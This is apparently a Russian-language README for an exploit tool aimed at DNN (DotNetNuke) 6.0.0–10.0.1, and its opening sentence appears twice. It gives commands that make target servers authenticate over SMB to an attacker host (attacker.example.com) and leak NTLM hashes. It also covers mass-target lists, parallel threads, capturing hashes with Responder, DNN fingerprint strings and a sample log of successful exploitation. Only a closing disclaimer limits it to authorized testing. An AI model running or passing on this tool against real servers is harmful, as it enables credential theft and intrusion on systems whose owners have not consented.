
Эта эксплойт нацелен на уязвимость в DNN (ранее DotNetNuke) версий с 6.0.0 до 10.0.1, которая позволяет злоумышленникам раскрывать NTLM-хэши через атаки нормализации путей в Unicode.
Этот эксплойт нацелен на уязвимость в DNN (ранее DotNetNuke) версий от 6.0.0 до 10.0.1, которая позволяет злоумышленникам раскрывать NTLM-хэши через атаки нормализации путей Unicode.
Эксплойт использует особенности Windows/.NET и нормализацию Unicode, чтобы заставить целевой сервер DNN отправлять SMB-запросы на сервер, контролируемый злоумышленником, что потенциально приводит к раскрытию NTLM-хэшей в процессе аутентификации.
pip install -r requirements.txt)python main.py targets.txt attacker.example.com
python main.py targets.txt 192.168.1.100 -t 20 --timeout 15
targets: Файл со списком хостов DNN (по одному на строку)smb_server: Имя хоста или IP SMB-сервера для захвата NTLM-хэшей-t, --threads: Количество параллельных потоков (по умолчанию: 10)--timeout: Тайм-аут запроса в секундах (по умолчанию: 10)Создайте текстовый файл с URL целей, по одному на строку:
http://target1.example.com
https://target2.example.com:8080
target3.example.com
Вы можете использовать такие инструменты, как Responder, для захвата NTLM-хэшей:
responder -I eth0 -wrf
Или используйте Burp Collaborator для внеполосного обнаружения.
[2025-01-XX-XX:XX:XX] [INFO] Starting DNN NTLM hash disclosure exploit against 5 targets
[2025-01-XX-XX:XX:XX] [INFO] SMB Server: attacker.example.com
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] DNN indicator found: dnn_IsMobile
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] File upload endpoint accessible
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] Exploit payload sent successfully
[2025-01-XX-XX:XX:XX] [INFO] [target1.com] Check your SMB server for incoming NTLM authentication attempts
Эксплойт ищет следующие индикаторы DNN:
dnn_IsMobiledotnetnuke в ответеdnnconnect в ответеDNN Platform в ответеЭтот инструмент предназначен только для образовательных целей и авторизованного тестирования безопасности. Используйте ответственно и только на системах, которыми вы владеете или на тестирование которых имеете явное разрешение.